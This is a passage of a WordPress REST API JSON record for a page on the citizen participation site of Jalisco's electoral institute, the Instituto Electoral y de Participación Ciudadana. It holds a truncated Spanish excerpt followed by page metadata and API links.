Participaci\u00f3n Ciudadana del Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado de Jalisco (Instituto Electoral) de conformidad con la estrategia [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":34,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-681","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/681","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=681"}],"version-history":[{"count":32,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/681\/revisions"}],"predecessor-version":[{"id":730,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/681\/revisions\/730"}],"up":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/34"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=681"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}